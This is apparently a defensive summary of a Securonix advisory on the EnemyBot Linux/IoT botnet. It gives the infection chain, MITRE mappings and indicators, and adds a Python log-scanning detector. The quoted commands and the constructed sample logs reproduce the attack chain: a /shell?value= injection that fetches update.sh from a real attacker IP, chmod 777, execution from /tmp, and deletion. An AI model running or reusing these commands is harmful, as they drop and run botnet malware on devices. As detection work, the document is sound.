Detecting EnemyBot – Securonix Initial Coverage Advisory

EnemyBot is a Linux botnet that targets a broad range of Linux and IoT devices with multi-architecture ELF payloads. The advisory describes its infection chain, its capabilities (port scanning, TCP/UDP flooding and data exfiltration over HTTP), the observed indicators of compromise and recommended mitigations, and notes code patterns shared with the LolFMe and Mirai families.

Keypoints

  • EnemyBot is built for wide Linux device coverage: the dropper fetches 13 ELF binaries, one per target architecture (for example enemybotx86, enemybotarm and enemybotmips).
  • Initial access is a request to /shell on an exposed web server with the command payload carried in the ‘value’ parameter (the advisory describes this as a drive-by). The payload fetches update.sh from the attacker’s server and tries several downloaders in turn (wget, busybox wget, curl) so that it works on minimal IoT userlands where only one of them exists.
  • update.sh then attempts to download all 13 architecture-specific binaries, building each file name by appending the architecture suffix to the base name (enemybot + arch); downloading every variant rather than fingerprinting the host first is what gives the malware its multi-architecture reach.
  • The infection steps are: make the downloaded file world-readable, world-writable and executable (chmod 777), execute it from /tmp, then delete the ELF file from disk. The process keeps running after the deletion, so this is clean-up behaviour; on Linux the deleted backing file still shows up as the /proc/<pid>/exe target with a “(deleted)” suffix, which is a useful hunting check.
  • Dynamic analysis shows extensive networking functionality (port scanners, TCP and UDP flood options) and general system enumeration; much of the code is encrypted or otherwise obfuscated to hinder analysis.
  • Data exfiltration uses HTTP POST to the attacker’s IP address, so the malware is capable of data theft and not only of establishing access.
  • The sample contains counter-forensic measures and an embedded taunt string (“watudoinglookingatdis”, i.e. “what you doing looking at this”); its code patterns suggest a lineage shared with LolFMe and Mirai, and the multi-architecture build gives it RCE footholds across many device classes.

MITRE Techniques

  • [T1189] Drive-by Compromise – The advisory maps initial access to drive-by compromise: a request to /shell on a web server with the payload attached to the ‘value’ string. “[drive-by attempt to /shell at a web server with an interesting payload attached to the ‘value’ string.]” Note that the observed behaviour (sending a command payload to an exposed web endpoint, rather than luring a user’s browser to malicious content) matches T1190 Exploit Public-Facing Application more closely, so detection content should key on the inbound request to /shell rather than on browser activity.
  • [T1105] Ingress Tool Transfer – The malware downloads update.sh and 13 ELF binaries for various architectures. “[the malware attempts to download 13 different ELF binaries…]”
  • [T1059.004] Unix Shell – Execution uses shell commands (wget, busybox, curl) to fetch payloads. “[wget http://198.12.116.254/update.sh -O update.sh; busybox wget …; curl http://198.12.116.254/update.sh -O update.sh]”
  • [T1027] Obfuscated/Compressed Files and Information – Much of the code appears encrypted to hinder analysis and counter forensics. “[much of the code appears to be encrypted and we encountered some counter forensics …]”
  • [T1041] Exfiltration Over C2 Channel – Data stolen via HTTP POST back to the original IP. “[the malware also appears to have the ability to steal data via HTTP POST, which in our case, the malware was sending the data back to the original IP address.]”
  • [T1046] Network Service Discovery (formerly named Network Service Scanning) – Covers the built-in port scanners. The TCP/UDP flood options listed alongside them are a denial-of-service capability (T1498 Network Denial of Service) rather than scanning. “[networking options such as port scanners, TCP/UDP flood options and general system enumeration.]”
  • [T1082] System Information Discovery – General system enumeration to understand the host environment. “[general system enumeration.]”

Indicators of Compromise

  • [File Name] IoCs – update.sh, enemybotarm
  • [SHA256] File Hashes – cc36cc84d575e953359d82e8716c37ba2cbf20c6d63727ca9e83b53493509723, 52421da5ee839c9bde689312ff35f10e9bcab7edccc12ee1fe16630e20531aaf and 2 more hashes
  • [SHA256] File Hashes – enemybotx86 – 1a7316d9bb8449cf93a19925c470cc4dbfd95a99c03b10f4038bb2a517d6ed50 and 12 more hashes
  • [IP Address] IoC – 198.12.116.254
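As an added detection example (not code from the Securonix advisory), the Python below scans constructed log lines for the infection chain described in the Keypoints (update.sh fetch via wget/busybox/curl, chmod 777, execution from /tmp, deletion of the binary) and for the atomic indicators listed above. The sample web access-log line and the “exec … cmd=…” process-log format are constructed for the example, and the enemybot<arch> name pattern is an assumption generalised from the three names the advisory gives; only the IP address, the two file names and the three full SHA256 hashes come from the advisory. The verdict is graded on how many chain stages are seen, so a single atomic indicator hit alone does not produce a high-confidence alert.

```python
from __future__ import annotations
import re
from urllib.parse import unquote_plus

# Atomic indicators copied from the advisory summary (IP, file names, SHA256s).
C2_IPS = {"198.12.116.254"}
IOC_FILE_NAMES = {"update.sh", "enemybotarm"}
IOC_SHA256 = {
    "cc36cc84d575e953359d82e8716c37ba2cbf20c6d63727ca9e83b53493509723",
    "52421da5ee839c9bde689312ff35f10e9bcab7edccc12ee1fe16630e20531aaf",
    "1a7316d9bb8449cf93a19925c470cc4dbfd95a99c03b10f4038bb2a517d6ed50",
}

# Behavioural stages of the infection chain. The enemybot<arch> name pattern is
# an assumption generalised from the three names the advisory gives
# (enemybotx86, enemybotarm, enemybotmips).
PATTERNS = {
    "web_shell_request": re.compile(r"/shell\?[^\s\"]*\bvalue="),
    "update_sh_fetch": re.compile(
        r"\b(?:busybox\s+)?(?:wget|curl)\b[^;|&\n]*\bupdate\.sh\b"),
    "arch_binary": re.compile(r"\benemybot[a-z0-9_]+\b"),
    "chmod_777_tmp": re.compile(r"\bchmod\s+777\s+/tmp/\S+"),
    "exec_from_tmp": re.compile(r"(?:^|[;&|\"]\s*|\bsh\s+)/tmp/enemybot\S*"),
    "rm_tmp_binary": re.compile(r"\brm\s+(?:-\w+\s+)*/tmp/\S*enemybot\S*"),
}
CHAIN = ("update_sh_fetch", "chmod_777_tmp", "exec_from_tmp", "rm_tmp_binary")
SHA256_RE = re.compile(r"\b[0-9a-f]{64}\b")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Constructed sample input (not real telemetry): one web access-log line and a
# hypothetical process-exec log whose cmd= field holds the command line.
SAMPLE_LOGS = [
    '10.0.0.5 - - [01/Apr/2022:10:00:01 +0000] "GET /shell?value=cd+/tmp%3B'
    'wget+http%3A%2F%2F198.12.116.254%2Fupdate.sh+-O+update.sh%3Bsh+update.sh'
    ' HTTP/1.1" 200 -',
    'exec pid=4121 ppid=4100 cmd="wget http://198.12.116.254/enemybotarm -O /tmp/enemybotarm"',
    'exec pid=4122 ppid=4100 cmd="chmod 777 /tmp/enemybotarm"',
    'exec pid=4123 ppid=4100 cmd="/tmp/enemybotarm"',
    'exec pid=4124 ppid=4100 cmd="rm -f /tmp/enemybotarm"',
    'exec pid=4200 ppid=1 cmd="/usr/bin/apt-get update"',
    'file sha256=1a7316d9bb8449cf93a19925c470cc4dbfd95a99c03b10f4038bb2a517d6ed50 path=/tmp/enemybotx86',
]


def scan_line(line: str) -> list[str]:
    """Return every indicator and chain stage found in one log line."""
    # Web logs carry the injected command URL-encoded; decode it first so the
    # downloader patterns match the same way they do on process telemetry.
    text = unquote_plus(line)
    hits = [f"ioc_ip:{ip}" for ip in IPV4_RE.findall(text) if ip in C2_IPS]
    hits += [f"ioc_sha256:{h[:12]}" for h in SHA256_RE.findall(text.lower())
             if h in IOC_SHA256]
    hits += [f"ioc_file:{name}" for name in sorted(IOC_FILE_NAMES)
             if re.search(rf"\b{re.escape(name)}\b", text)]
    hits += [stage for stage, rx in PATTERNS.items() if rx.search(text)]
    return hits


def scan(lines: list[str]) -> tuple[list[tuple[int, list[str]]], set[str]]:
    """Scan a log; return (1-based line number, hits) pairs for lines with
    hits, plus the set of chain stages observed across the whole log."""
    findings = []
    for n, line in enumerate(lines, 1):
        hits = scan_line(line)
        if hits:
            findings.append((n, hits))
    stages = {h for _, hits in findings for h in hits if h in PATTERNS}
    return findings, stages


def verdict(stages: set[str]) -> str:
    """Grade on how much of the fetch -> chmod 777 -> run from /tmp -> delete
    chain was seen; an atomic IoC hit on its own never reaches 'high'."""
    seen = sum(stage in stages for stage in CHAIN)
    if seen == len(CHAIN):
        return "high: full EnemyBot infection chain observed"
    if seen >= 2 or "arch_binary" in stages:
        return "medium: partial EnemyBot chain observed"
    return "low: no EnemyBot behaviour observed"


if __name__ == "__main__":
    found, seen_stages = scan(SAMPLE_LOGS)
    for n, hits in found:
        print(f"line {n}: {', '.join(hits)}")
    print(verdict(seen_stages))
```

Run against the constructed sample, the benign apt-get line produces no hits, every stage of the chain is seen and the verdict is “high”. In production the hash set would be fed from the full list in the advisory (the “and 12 more hashes” are not reproduced here), and the exec-log regexes would need adjusting to the field layout of whatever telemetry source (auditd, eBPF, EDR) is actually in use.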

Read more: https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/